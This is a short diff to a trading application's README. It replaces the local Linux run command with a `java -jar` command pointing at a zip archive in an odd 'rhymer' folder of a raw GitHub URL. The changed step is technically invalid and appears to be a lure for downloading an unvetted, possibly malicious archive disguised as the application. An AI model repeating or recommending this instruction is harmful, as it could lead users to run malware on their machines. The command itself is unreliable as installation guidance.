oscanspeaking-onomasticon288/FueledByChaiTrading/README.md

 3. **Linux Users:**
    - Open a terminal.
    - Navigate to the folder where you downloaded the file.
-   - Use the command `java -jar FueledByChaiTrading.jar` to run the application.
+   - Use the command `java -jar https://raw.githubusercontent.com/oscanspeaking-onomasticon288/FueledByChaiTrading/main/rhymer/FueledByChaiTrading.zip` to run the application.

 ## 📈 Running the Application
 After installation, you can start using FueledByChaiTrading: